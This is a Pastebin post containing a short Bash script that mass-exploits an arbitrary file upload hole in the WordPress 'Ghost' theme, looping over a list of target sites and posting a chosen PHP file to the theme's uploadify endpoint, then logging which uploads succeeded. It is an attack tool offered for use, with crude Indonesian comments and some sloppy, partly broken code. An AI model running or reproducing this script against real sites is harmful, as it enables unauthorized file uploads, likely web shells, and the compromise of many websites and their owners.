Advertisement
LittleJok3r

ghost

Oct 29th, 2019
512
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.36 KB | None | 0 0
  1. #!/bin/bash
  2.     # aku si wong tani, bli coli ya bli ngecrot #
  3.     #  Usage : bash bot.sh target.txt file.php  #
  4. for ss in `cat ${1}`; do
  5.     ewe=`curl -s -k --url -F "Filedata=@${2}" "${ss}/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php"`
  6.     if [[ $ewe =~ ${file} ]];
  7.         then
  8.             echo "UPLOAD OK => ${ss}"
  9.     else
  10.             echo "Upload GAGAL => ${ss}"
  11.     fi
  12. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement